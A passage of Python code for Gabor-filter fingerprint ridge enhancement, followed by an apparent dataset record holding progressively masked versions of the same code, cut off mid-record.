reffilter = np.exp(-((np.power(x, 2)) / (sigmax * sigmax) + (np.power(y, 2)) / (sigmay * sigmay))
) * np.cos(2 * np.pi * unfreq[0] * x) # this is the original gabor filter
filt_rows, filt_cols = reffilter.shape
gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))
for o in range(0, 180 // angleInc):
# Generate rotated versions of the filter. Note orientation
# image provides orientation *along* the ridges, hence +90
# degrees, and imrotate requires angles +ve anticlockwise, hence
# the minus sign.
rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90), reshape=False)
gabor_filter[o] = rot_filt
# Find indices of matrix points greater than maxsze from the image
# boundary
maxsze = int(sze)
temp = freq > 0
validr, validc = np.where(temp)
temp1 = validr > maxsze
temp2 = validr < rows - maxsze
temp3 = validc > maxsze
temp4 = validc < cols - maxsze
final_temp = temp1 & temp2 & temp3 & temp4
finalind = np.where(final_temp)
# Convert orientation matrix values from radians to an index value
# that corresponds to round(degrees/angleInc)
maxorient_index = np.round(180 / angleInc)
orient_index = np.round(orient / np.pi * 180 / angleInc)
# do the filtering
for i in range(0, rows):
for j in range(0, cols):
if orient_index[i][j] < 1:
orient_index[i][j] = orient_index[i][j] + maxorient_index
if orient_index[i][j] > maxorient_index:
orient_index[i][j] = orient_index[i][j] - maxorient_index
finalind_rows, finalind_cols = np.shape(finalind)
sze = int(sze)
for k in range(0, finalind_cols):
r = validr[finalind[0][k]]
c = validc[finalind[0][k]]
img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]
new_im[r][c] = np.sum(
img_block * gabor_filter[int(orient_index[r][c]) - 1])
return new_im
def image_enhance(img):
blksze = 16
thresh = 0.1
# normalise the image and find a ROI
normim, mask = ridge_segment(img, blksze, thresh)
gradientsigma = 1
blocksigma = 7
orientsmoothsigma = 7
# find orientation of every pixel
orientim = ridge_orient(normim, gradientsigma,
blocksigma, orientsmoothsigma)
blksze = 38
windsze = 5
min_wave_length = 5
max_wave_length = 15
# find the overall frequency of ridges
freq, medfreq = ridge_freq(
normim, mask, orientim, blksze, windsze, min_wave_length, max_wave_length)
freq = medfreq * mask
kx = ky = 0.65
# create gabor filter and do the actual filtering
new_im = ridge_filter(normim, orientim, freq, kx, ky)
return (new_im < -3)
def gabor_enhance(in_path, out_dir='./'):
img = cv2.imread(in_path, 0)
enhanced_img = image_enhance(img)
enhanced_img = np.invert(enhanced_img)
# print('saving the image')
img = enhanced_img * 255
base_image_name = os.path.splitext(os.path.basename(in_path))[0]
prefix = base_image_name.split('_normal')[0]
img_out = out_dir + prefix + '_enhanced.png'
# img.save(base_image_name + "_enhanced.png", "PNG")
cv2.imwrite(img_out, img)
return img_out
|
normal
|
{
"blob_id": "9447d0d0481df3d0ee4273256d02977bc8044e4e",
"index": 8603,
"step-1": "<mask token>\n\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n sze = np.fix(6 * gradientsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)\n f = gauss * gauss.T\n fy, fx = np.gradient(f)\n Gx = signal.convolve2d(im, fx, mode='same')\n Gy = signal.convolve2d(im, fy, mode='same')\n Gxx = np.power(Gx, 2)\n Gyy = np.power(Gy, 2)\n Gxy = Gx * Gy\n sze = np.fix(6 * blocksigma)\n gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)\n f = gauss * gauss.T\n Gxx = scipy.ndimage.convolve(Gxx, f)\n Gyy = scipy.ndimage.convolve(Gyy, f)\n Gxy = 2 * scipy.ndimage.convolve(Gxy, f)\n denom = np.sqrt(np.power(Gxy, 2) + np.power(Gxx - Gyy, 2)) + np.finfo(float\n ).eps\n sin2theta = Gxy / denom\n cos2theta = (Gxx - Gyy) / denom\n if orientsmoothsigma:\n sze = np.fix(6 * orientsmoothsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)\n f = gauss * gauss.T\n cos2theta = scipy.ndimage.convolve(cos2theta, f)\n sin2theta = scipy.ndimage.convolve(sin2theta, f)\n orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2\n return orientim\n\n\ndef frequest(im, orientim, windsze, minWaveLength, maxWaveLength):\n rows, cols = np.shape(im)\n cosorient = np.mean(np.cos(2 * orientim))\n sinorient = np.mean(np.sin(2 * orientim))\n orient = math.atan2(sinorient, cosorient) / 2\n rotim = scipy.ndimage.rotate(im, orient / np.pi * 180 + 90, axes=(1, 0),\n reshape=False, order=3, mode='nearest')\n cropsze = int(np.fix(rows / np.sqrt(2)))\n offset = int(np.fix((rows - cropsze) / 2))\n rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]\n proj = np.sum(rotim, axis=0)\n dilation = scipy.ndimage.grey_dilation(proj, windsze, structure=np.ones\n (windsze))\n temp = np.abs(dilation - proj)\n peak_thresh = 2\n maxpts = (temp < peak_thresh) & (proj > np.mean(proj))\n maxind = np.where(maxpts)\n rows_maxind, cols_maxind = np.shape(maxind)\n if cols_maxind < 2:\n freqim = np.zeros(im.shape)\n else:\n NoOfPeaks = cols_maxind\n waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks -\n 1)\n if waveLength >= minWaveLength and waveLength <= maxWaveLength:\n freqim = 1 / np.double(waveLength) * np.ones(im.shape)\n else:\n freqim = np.zeros(im.shape)\n return freqim\n\n\ndef ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength\n ):\n rows, cols = im.shape\n freq = np.zeros((rows, cols))\n for r in range(0, rows - blksze, blksze):\n for c in range(0, cols - blksze, blksze):\n blkim = im[r:r + blksze][:, c:c + blksze]\n blkor = orient[r:r + blksze][:, c:c + blksze]\n freq[r:r + blksze][:, c:c + blksze] = frequest(blkim, blkor,\n windsze, minWaveLength, maxWaveLength)\n freq = freq * mask\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n meanfreq = np.mean(non_zero_elems_in_freq)\n medianfreq = np.median(non_zero_elems_in_freq)\n return freq, meanfreq\n\n\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3\n im = np.double(im)\n rows, cols = im.shape\n new_im = np.zeros((rows, cols))\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n non_zero_elems_in_freq = np.double(np.round(non_zero_elems_in_freq * 100)\n ) / 100\n unfreq = np.unique(non_zero_elems_in_freq)\n sigmax = 1 / unfreq[0] * kx\n sigmay = 1 / unfreq[0] * ky\n sze = np.round(3 * np.max([sigmax, sigmay]))\n x, y = np.meshgrid(np.linspace(-sze, sze, 2 * sze + 1), np.linspace(-\n sze, sze, 2 * sze + 1))\n reffilter = np.exp(-(np.power(x, 2) / (sigmax * sigmax) + np.power(y, 2\n ) / (sigmay * sigmay))) * np.cos(2 * np.pi * unfreq[0] * x)\n filt_rows, filt_cols = reffilter.shape\n gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))\n for o in range(0, 180 // angleInc):\n rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90),\n reshape=False)\n gabor_filter[o] = rot_filt\n maxsze = int(sze)\n temp = freq > 0\n validr, validc = np.where(temp)\n temp1 = validr > maxsze\n temp2 = validr < rows - maxsze\n temp3 = validc > maxsze\n temp4 = validc < cols - maxsze\n final_temp = temp1 & temp2 & temp3 & temp4\n finalind = np.where(final_temp)\n maxorient_index = np.round(180 / angleInc)\n orient_index = np.round(orient / np.pi * 180 / angleInc)\n for i in range(0, rows):\n for j in range(0, cols):\n if orient_index[i][j] < 1:\n orient_index[i][j] = orient_index[i][j] + maxorient_index\n if orient_index[i][j] > maxorient_index:\n orient_index[i][j] = orient_index[i][j] - maxorient_index\n finalind_rows, finalind_cols = np.shape(finalind)\n sze = int(sze)\n for k in range(0, finalind_cols):\n r = validr[finalind[0][k]]\n c = validc[finalind[0][k]]\n img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]\n new_im[r][c] = np.sum(img_block * gabor_filter[int(orient_index[r][\n c]) - 1])\n return new_im\n\n\ndef image_enhance(img):\n blksze = 16\n thresh = 0.1\n normim, mask = ridge_segment(img, blksze, thresh)\n gradientsigma = 1\n blocksigma = 7\n orientsmoothsigma = 7\n orientim = ridge_orient(normim, gradientsigma, blocksigma,\n orientsmoothsigma)\n blksze = 38\n windsze = 5\n min_wave_length = 5\n max_wave_length = 15\n freq, medfreq = ridge_freq(normim, mask, orientim, blksze, windsze,\n min_wave_length, max_wave_length)\n freq = medfreq * mask\n kx = ky = 0.65\n new_im = ridge_filter(normim, orientim, freq, kx, ky)\n return new_im < -3\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef normalise(img):\n normed = (img - np.mean(img)) / np.std(img)\n return normed\n\n\n<mask token>\n\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n sze = np.fix(6 * gradientsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)\n f = gauss * gauss.T\n fy, fx = np.gradient(f)\n Gx = signal.convolve2d(im, fx, mode='same')\n Gy = signal.convolve2d(im, fy, mode='same')\n Gxx = np.power(Gx, 2)\n Gyy = np.power(Gy, 2)\n Gxy = Gx * Gy\n sze = np.fix(6 * blocksigma)\n gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)\n f = gauss * gauss.T\n Gxx = scipy.ndimage.convolve(Gxx, f)\n Gyy = scipy.ndimage.convolve(Gyy, f)\n Gxy = 2 * scipy.ndimage.convolve(Gxy, f)\n denom = np.sqrt(np.power(Gxy, 2) + np.power(Gxx - Gyy, 2)) + np.finfo(float\n ).eps\n sin2theta = Gxy / denom\n cos2theta = (Gxx - Gyy) / denom\n if orientsmoothsigma:\n sze = np.fix(6 * orientsmoothsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)\n f = gauss * gauss.T\n cos2theta = scipy.ndimage.convolve(cos2theta, f)\n sin2theta = scipy.ndimage.convolve(sin2theta, f)\n orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2\n return orientim\n\n\ndef frequest(im, orientim, windsze, minWaveLength, maxWaveLength):\n rows, cols = np.shape(im)\n cosorient = np.mean(np.cos(2 * orientim))\n sinorient = np.mean(np.sin(2 * orientim))\n orient = math.atan2(sinorient, cosorient) / 2\n rotim = scipy.ndimage.rotate(im, orient / np.pi * 180 + 90, axes=(1, 0),\n reshape=False, order=3, mode='nearest')\n cropsze = int(np.fix(rows / np.sqrt(2)))\n offset = int(np.fix((rows - cropsze) / 2))\n rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]\n proj = np.sum(rotim, axis=0)\n dilation = scipy.ndimage.grey_dilation(proj, windsze, structure=np.ones\n (windsze))\n temp = np.abs(dilation - proj)\n peak_thresh = 2\n maxpts = (temp < peak_thresh) & (proj > np.mean(proj))\n maxind = np.where(maxpts)\n rows_maxind, cols_maxind = np.shape(maxind)\n if cols_maxind < 2:\n freqim = np.zeros(im.shape)\n else:\n NoOfPeaks = cols_maxind\n waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks -\n 1)\n if waveLength >= minWaveLength and waveLength <= maxWaveLength:\n freqim = 1 / np.double(waveLength) * np.ones(im.shape)\n else:\n freqim = np.zeros(im.shape)\n return freqim\n\n\ndef ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength\n ):\n rows, cols = im.shape\n freq = np.zeros((rows, cols))\n for r in range(0, rows - blksze, blksze):\n for c in range(0, cols - blksze, blksze):\n blkim = im[r:r + blksze][:, c:c + blksze]\n blkor = orient[r:r + blksze][:, c:c + blksze]\n freq[r:r + blksze][:, c:c + blksze] = frequest(blkim, blkor,\n windsze, minWaveLength, maxWaveLength)\n freq = freq * mask\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n meanfreq = np.mean(non_zero_elems_in_freq)\n medianfreq = np.median(non_zero_elems_in_freq)\n return freq, meanfreq\n\n\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3\n im = np.double(im)\n rows, cols = im.shape\n new_im = np.zeros((rows, cols))\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n non_zero_elems_in_freq = np.double(np.round(non_zero_elems_in_freq * 100)\n ) / 100\n unfreq = np.unique(non_zero_elems_in_freq)\n sigmax = 1 / unfreq[0] * kx\n sigmay = 1 / unfreq[0] * ky\n sze = np.round(3 * np.max([sigmax, sigmay]))\n x, y = np.meshgrid(np.linspace(-sze, sze, 2 * sze + 1), np.linspace(-\n sze, sze, 2 * sze + 1))\n reffilter = np.exp(-(np.power(x, 2) / (sigmax * sigmax) + np.power(y, 2\n ) / (sigmay * sigmay))) * np.cos(2 * np.pi * unfreq[0] * x)\n filt_rows, filt_cols = reffilter.shape\n gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))\n for o in range(0, 180 // angleInc):\n rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90),\n reshape=False)\n gabor_filter[o] = rot_filt\n maxsze = int(sze)\n temp = freq > 0\n validr, validc = np.where(temp)\n temp1 = validr > maxsze\n temp2 = validr < rows - maxsze\n temp3 = validc > maxsze\n temp4 = validc < cols - maxsze\n final_temp = temp1 & temp2 & temp3 & temp4\n finalind = np.where(final_temp)\n maxorient_index = np.round(180 / angleInc)\n orient_index = np.round(orient / np.pi * 180 / angleInc)\n for i in range(0, rows):\n for j in range(0, cols):\n if orient_index[i][j] < 1:\n orient_index[i][j] = orient_index[i][j] + maxorient_index\n if orient_index[i][j] > maxorient_index:\n orient_index[i][j] = orient_index[i][j] - maxorient_index\n finalind_rows, finalind_cols = np.shape(finalind)\n sze = int(sze)\n for k in range(0, finalind_cols):\n r = validr[finalind[0][k]]\n c = validc[finalind[0][k]]\n img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]\n new_im[r][c] = np.sum(img_block * gabor_filter[int(orient_index[r][\n c]) - 1])\n return new_im\n\n\ndef image_enhance(img):\n blksze = 16\n thresh = 0.1\n normim, mask = ridge_segment(img, blksze, thresh)\n gradientsigma = 1\n blocksigma = 7\n orientsmoothsigma = 7\n orientim = ridge_orient(normim, gradientsigma, blocksigma,\n orientsmoothsigma)\n blksze = 38\n windsze = 5\n min_wave_length = 5\n max_wave_length = 15\n freq, medfreq = ridge_freq(normim, mask, orientim, blksze, windsze,\n min_wave_length, max_wave_length)\n freq = medfreq * mask\n kx = ky = 0.65\n new_im = ridge_filter(normim, orientim, freq, kx, ky)\n return new_im < -3\n\n\ndef gabor_enhance(in_path, out_dir='./'):\n img = cv2.imread(in_path, 0)\n enhanced_img = image_enhance(img)\n enhanced_img = np.invert(enhanced_img)\n img = enhanced_img * 255\n base_image_name = os.path.splitext(os.path.basename(in_path))[0]\n prefix = base_image_name.split('_normal')[0]\n img_out = out_dir + prefix + '_enhanced.png'\n cv2.imwrite(img_out, img)\n return img_out\n",
"step-3": "<mask token>\n\n\ndef normalise(img):\n normed = (img - np.mean(img)) / np.std(img)\n return normed\n\n\ndef ridge_segment(im, blksze, thresh):\n rows, cols = im.shape\n im = normalise(im)\n new_rows = np.int(blksze * np.ceil(rows / blksze))\n new_cols = np.int(blksze * np.ceil(cols / blksze))\n padded_img = np.zeros((new_rows, new_cols))\n stddevim = np.zeros((new_rows, new_cols))\n padded_img[0:rows][:, 0:cols] = im\n for i in range(0, new_rows, blksze):\n for j in range(0, new_cols, blksze):\n block = padded_img[i:i + blksze][:, j:j + blksze]\n stddevim[i:i + blksze][:, j:j + blksze] = np.std(block) * np.ones(\n block.shape)\n stddevim = stddevim[0:rows][:, 0:cols]\n mask = stddevim > thresh\n mean_val = np.mean(im[mask])\n std_val = np.std(im[mask])\n normim = (im - mean_val) / std_val\n return normim, mask\n\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n sze = np.fix(6 * gradientsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)\n f = gauss * gauss.T\n fy, fx = np.gradient(f)\n Gx = signal.convolve2d(im, fx, mode='same')\n Gy = signal.convolve2d(im, fy, mode='same')\n Gxx = np.power(Gx, 2)\n Gyy = np.power(Gy, 2)\n Gxy = Gx * Gy\n sze = np.fix(6 * blocksigma)\n gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)\n f = gauss * gauss.T\n Gxx = scipy.ndimage.convolve(Gxx, f)\n Gyy = scipy.ndimage.convolve(Gyy, f)\n Gxy = 2 * scipy.ndimage.convolve(Gxy, f)\n denom = np.sqrt(np.power(Gxy, 2) + np.power(Gxx - Gyy, 2)) + np.finfo(float\n ).eps\n sin2theta = Gxy / denom\n cos2theta = (Gxx - Gyy) / denom\n if orientsmoothsigma:\n sze = np.fix(6 * orientsmoothsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)\n f = gauss * gauss.T\n cos2theta = scipy.ndimage.convolve(cos2theta, f)\n sin2theta = scipy.ndimage.convolve(sin2theta, f)\n orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2\n return orientim\n\n\ndef frequest(im, orientim, windsze, minWaveLength, maxWaveLength):\n rows, cols = np.shape(im)\n cosorient = np.mean(np.cos(2 * orientim))\n sinorient = np.mean(np.sin(2 * orientim))\n orient = math.atan2(sinorient, cosorient) / 2\n rotim = scipy.ndimage.rotate(im, orient / np.pi * 180 + 90, axes=(1, 0),\n reshape=False, order=3, mode='nearest')\n cropsze = int(np.fix(rows / np.sqrt(2)))\n offset = int(np.fix((rows - cropsze) / 2))\n rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]\n proj = np.sum(rotim, axis=0)\n dilation = scipy.ndimage.grey_dilation(proj, windsze, structure=np.ones\n (windsze))\n temp = np.abs(dilation - proj)\n peak_thresh = 2\n maxpts = (temp < peak_thresh) & (proj > np.mean(proj))\n maxind = np.where(maxpts)\n rows_maxind, cols_maxind = np.shape(maxind)\n if cols_maxind < 2:\n freqim = np.zeros(im.shape)\n else:\n NoOfPeaks = cols_maxind\n waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks -\n 1)\n if waveLength >= minWaveLength and waveLength <= maxWaveLength:\n freqim = 1 / np.double(waveLength) * np.ones(im.shape)\n else:\n freqim = np.zeros(im.shape)\n return freqim\n\n\ndef ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength\n ):\n rows, cols = im.shape\n freq = np.zeros((rows, cols))\n for r in range(0, rows - blksze, blksze):\n for c in range(0, cols - blksze, blksze):\n blkim = im[r:r + blksze][:, c:c + blksze]\n blkor = orient[r:r + blksze][:, c:c + blksze]\n freq[r:r + blksze][:, c:c + blksze] = frequest(blkim, blkor,\n windsze, minWaveLength, maxWaveLength)\n freq = freq * mask\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n meanfreq = np.mean(non_zero_elems_in_freq)\n medianfreq = np.median(non_zero_elems_in_freq)\n return freq, meanfreq\n\n\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3\n im = np.double(im)\n rows, cols = im.shape\n new_im = np.zeros((rows, cols))\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n non_zero_elems_in_freq = np.double(np.round(non_zero_elems_in_freq * 100)\n ) / 100\n unfreq = np.unique(non_zero_elems_in_freq)\n sigmax = 1 / unfreq[0] * kx\n sigmay = 1 / unfreq[0] * ky\n sze = np.round(3 * np.max([sigmax, sigmay]))\n x, y = np.meshgrid(np.linspace(-sze, sze, 2 * sze + 1), np.linspace(-\n sze, sze, 2 * sze + 1))\n reffilter = np.exp(-(np.power(x, 2) / (sigmax * sigmax) + np.power(y, 2\n ) / (sigmay * sigmay))) * np.cos(2 * np.pi * unfreq[0] * x)\n filt_rows, filt_cols = reffilter.shape\n gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))\n for o in range(0, 180 // angleInc):\n rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90),\n reshape=False)\n gabor_filter[o] = rot_filt\n maxsze = int(sze)\n temp = freq > 0\n validr, validc = np.where(temp)\n temp1 = validr > maxsze\n temp2 = validr < rows - maxsze\n temp3 = validc > maxsze\n temp4 = validc < cols - maxsze\n final_temp = temp1 & temp2 & temp3 & temp4\n finalind = np.where(final_temp)\n maxorient_index = np.round(180 / angleInc)\n orient_index = np.round(orient / np.pi * 180 / angleInc)\n for i in range(0, rows):\n for j in range(0, cols):\n if orient_index[i][j] < 1:\n orient_index[i][j] = orient_index[i][j] + maxorient_index\n if orient_index[i][j] > maxorient_index:\n orient_index[i][j] = orient_index[i][j] - maxorient_index\n finalind_rows, finalind_cols = np.shape(finalind)\n sze = int(sze)\n for k in range(0, finalind_cols):\n r = validr[finalind[0][k]]\n c = validc[finalind[0][k]]\n img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]\n new_im[r][c] = np.sum(img_block * gabor_filter[int(orient_index[r][\n c]) - 1])\n return new_im\n\n\ndef image_enhance(img):\n blksze = 16\n thresh = 0.1\n normim, mask = ridge_segment(img, blksze, thresh)\n gradientsigma = 1\n blocksigma = 7\n orientsmoothsigma = 7\n orientim = ridge_orient(normim, gradientsigma, blocksigma,\n orientsmoothsigma)\n blksze = 38\n windsze = 5\n min_wave_length = 5\n max_wave_length = 15\n freq, medfreq = ridge_freq(normim, mask, orientim, blksze, windsze,\n min_wave_length, max_wave_length)\n freq = medfreq * mask\n kx = ky = 0.65\n new_im = ridge_filter(normim, orientim, freq, kx, ky)\n return new_im < -3\n\n\ndef gabor_enhance(in_path, out_dir='./'):\n img = cv2.imread(in_path, 0)\n enhanced_img = image_enhance(img)\n enhanced_img = np.invert(enhanced_img)\n img = enhanced_img * 255\n base_image_name = os.path.splitext(os.path.basename(in_path))[0]\n prefix = base_image_name.split('_normal')[0]\n img_out = out_dir + prefix + '_enhanced.png'\n cv2.imwrite(img_out, img)\n return img_out\n",
"step-4": "<mask token>\nimport os\nimport cv2\nimport math\nimport scipy\nimport numpy as np\nfrom scipy import signal\n\n\ndef normalise(img):\n normed = (img - np.mean(img)) / np.std(img)\n return normed\n\n\ndef ridge_segment(im, blksze, thresh):\n rows, cols = im.shape\n im = normalise(im)\n new_rows = np.int(blksze * np.ceil(rows / blksze))\n new_cols = np.int(blksze * np.ceil(cols / blksze))\n padded_img = np.zeros((new_rows, new_cols))\n stddevim = np.zeros((new_rows, new_cols))\n padded_img[0:rows][:, 0:cols] = im\n for i in range(0, new_rows, blksze):\n for j in range(0, new_cols, blksze):\n block = padded_img[i:i + blksze][:, j:j + blksze]\n stddevim[i:i + blksze][:, j:j + blksze] = np.std(block) * np.ones(\n block.shape)\n stddevim = stddevim[0:rows][:, 0:cols]\n mask = stddevim > thresh\n mean_val = np.mean(im[mask])\n std_val = np.std(im[mask])\n normim = (im - mean_val) / std_val\n return normim, mask\n\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n sze = np.fix(6 * gradientsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)\n f = gauss * gauss.T\n fy, fx = np.gradient(f)\n Gx = signal.convolve2d(im, fx, mode='same')\n Gy = signal.convolve2d(im, fy, mode='same')\n Gxx = np.power(Gx, 2)\n Gyy = np.power(Gy, 2)\n Gxy = Gx * Gy\n sze = np.fix(6 * blocksigma)\n gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)\n f = gauss * gauss.T\n Gxx = scipy.ndimage.convolve(Gxx, f)\n Gyy = scipy.ndimage.convolve(Gyy, f)\n Gxy = 2 * scipy.ndimage.convolve(Gxy, f)\n denom = np.sqrt(np.power(Gxy, 2) + np.power(Gxx - Gyy, 2)) + np.finfo(float\n ).eps\n sin2theta = Gxy / denom\n cos2theta = (Gxx - Gyy) / denom\n if orientsmoothsigma:\n sze = np.fix(6 * orientsmoothsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)\n f = gauss * gauss.T\n cos2theta = scipy.ndimage.convolve(cos2theta, f)\n sin2theta = scipy.ndimage.convolve(sin2theta, f)\n orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2\n return orientim\n\n\ndef frequest(im, orientim, windsze, minWaveLength, maxWaveLength):\n rows, cols = np.shape(im)\n cosorient = np.mean(np.cos(2 * orientim))\n sinorient = np.mean(np.sin(2 * orientim))\n orient = math.atan2(sinorient, cosorient) / 2\n rotim = scipy.ndimage.rotate(im, orient / np.pi * 180 + 90, axes=(1, 0),\n reshape=False, order=3, mode='nearest')\n cropsze = int(np.fix(rows / np.sqrt(2)))\n offset = int(np.fix((rows - cropsze) / 2))\n rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]\n proj = np.sum(rotim, axis=0)\n dilation = scipy.ndimage.grey_dilation(proj, windsze, structure=np.ones\n (windsze))\n temp = np.abs(dilation - proj)\n peak_thresh = 2\n maxpts = (temp < peak_thresh) & (proj > np.mean(proj))\n maxind = np.where(maxpts)\n rows_maxind, cols_maxind = np.shape(maxind)\n if cols_maxind < 2:\n freqim = np.zeros(im.shape)\n else:\n NoOfPeaks = cols_maxind\n waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks -\n 1)\n if waveLength >= minWaveLength and waveLength <= maxWaveLength:\n freqim = 1 / np.double(waveLength) * np.ones(im.shape)\n else:\n freqim = np.zeros(im.shape)\n return freqim\n\n\ndef ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength\n ):\n rows, cols = im.shape\n freq = np.zeros((rows, cols))\n for r in range(0, rows - blksze, blksze):\n for c in range(0, cols - blksze, blksze):\n blkim = im[r:r + blksze][:, c:c + blksze]\n blkor = orient[r:r + blksze][:, c:c + blksze]\n freq[r:r + blksze][:, c:c + blksze] = frequest(blkim, blkor,\n windsze, minWaveLength, maxWaveLength)\n freq = freq * mask\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n meanfreq = np.mean(non_zero_elems_in_freq)\n medianfreq = np.median(non_zero_elems_in_freq)\n return freq, meanfreq\n\n\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3\n im = np.double(im)\n rows, cols = im.shape\n new_im = np.zeros((rows, cols))\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n non_zero_elems_in_freq = np.double(np.round(non_zero_elems_in_freq * 100)\n ) / 100\n unfreq = np.unique(non_zero_elems_in_freq)\n sigmax = 1 / unfreq[0] * kx\n sigmay = 1 / unfreq[0] * ky\n sze = np.round(3 * np.max([sigmax, sigmay]))\n x, y = np.meshgrid(np.linspace(-sze, sze, 2 * sze + 1), np.linspace(-\n sze, sze, 2 * sze + 1))\n reffilter = np.exp(-(np.power(x, 2) / (sigmax * sigmax) + np.power(y, 2\n ) / (sigmay * sigmay))) * np.cos(2 * np.pi * unfreq[0] * x)\n filt_rows, filt_cols = reffilter.shape\n gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))\n for o in range(0, 180 // angleInc):\n rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90),\n reshape=False)\n gabor_filter[o] = rot_filt\n maxsze = int(sze)\n temp = freq > 0\n validr, validc = np.where(temp)\n temp1 = validr > maxsze\n temp2 = validr < rows - maxsze\n temp3 = validc > maxsze\n temp4 = validc < cols - maxsze\n final_temp = temp1 & temp2 & temp3 & temp4\n finalind = np.where(final_temp)\n maxorient_index = np.round(180 / angleInc)\n orient_index = np.round(orient / np.pi * 180 / angleInc)\n for i in range(0, rows):\n for j in range(0, cols):\n if orient_index[i][j] < 1:\n orient_index[i][j] = orient_index[i][j] + maxorient_index\n if orient_index[i][j] > maxorient_index:\n orient_index[i][j] = orient_index[i][j] - maxorient_index\n finalind_rows, finalind_cols = np.shape(finalind)\n sze = int(sze)\n for k in range(0, finalind_cols):\n r = validr[finalind[0][k]]\n c = validc[finalind[0][k]]\n img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]\n new_im[r][c] = np.sum(img_block * gabor_filter[int(orient_index[r][\n c]) - 1])\n return new_im\n\n\ndef image_enhance(img):\n blksze = 16\n thresh = 0.1\n normim, mask = ridge_segment(img, blksze, thresh)\n gradientsigma = 1\n blocksigma = 7\n orientsmoothsigma = 7\n orientim = ridge_orient(normim, gradientsigma, blocksigma,\n orientsmoothsigma)\n blksze = 38\n 